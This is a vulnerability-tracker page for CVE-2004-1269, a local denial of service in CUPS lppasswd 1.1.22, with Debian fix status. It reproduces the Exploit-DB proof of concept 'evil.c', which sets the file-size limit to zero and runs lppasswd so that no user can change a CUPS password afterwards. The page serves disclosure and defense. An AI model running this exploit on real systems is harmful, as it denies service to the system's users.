CVE-2004-1269

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

lppasswd in CUPS 1.1.22 does not remove the passwd.new file if it encounters a file-size resource limit while writing to passwd.new, which causes subsequent invocations of lppasswd to fail.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-25012 dos windows verified text · 2 KB

Bartlomiej Sieka · 2004-12-11

Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service

text exploit Source: Exploit-DB

// source: https://www.securityfocus.com/bid/12005/info

Easy Software Products lppasswd is prone to a locally exploitable denial of service vulnerability. This issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. This presents a vulnerability since an unprivileged user with CUPS credentials may set these resource limits and then invoke the application. This will create an empty '/usr/local/etc/cups/passwd.new' file. If this file is present, then future invocations of lppasswd will fail.

Successful exploitation will prevent users from changing their CUPS passwords with lppasswd. 

/*
 * evil.c
 * 2004.12.11
 * Bartlomiej Sieka
 *
 * This program executes the lpasswd(1) password changing utility
 * in way that prevents its further use, i.e. after this program
 * has been executed, all users on the system will be unable to change
 * their CUPS passwords. This is not a documented feature of lppasswd(1)
 * and is certainly unauthorized.
 *
 * This program has been tested with lppasswd(1) versions 1.1.19 and
 * 1.1.22 on FreeBSD 5.2.
 *
 * The recipe:
 * gcc -o evil evil.c
 * ./evil
 * Type in passwords as requested, and voila! This will create an empty
 * file /usr/local/etc/cups/passwd.new. The existence of this file makes
 * lppasswd(1) quit before changing users password with message
 * "lppasswd: Password file busy!".
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
extern char **environ;

int main(int argc, char **argv){

  char *cmd = "/usr/local/bin/lppasswd";
  char *args[] = { "/usr/local/bin/lppasswd", 0x00 };

  /* set the file size limit to 0 */
  struct rlimit rl;
  rl.rlim_cur = 0;
  rl.rlim_max = 0;
  setrlimit(RLIMIT_FSIZE, &rl);

  /* execute the poor victim */
  execve(cmd, args, environ);
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.1.22-2`
sid	Fixed	`1.1.22-2`
forky	Fixed	`1.1.22-2`
bullseye	Fixed	`1.1.22-2`
bookworm	Fixed	`1.1.22-2`

References

https://security-tracker.debian.org/tracker/CVE-2004-1269

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.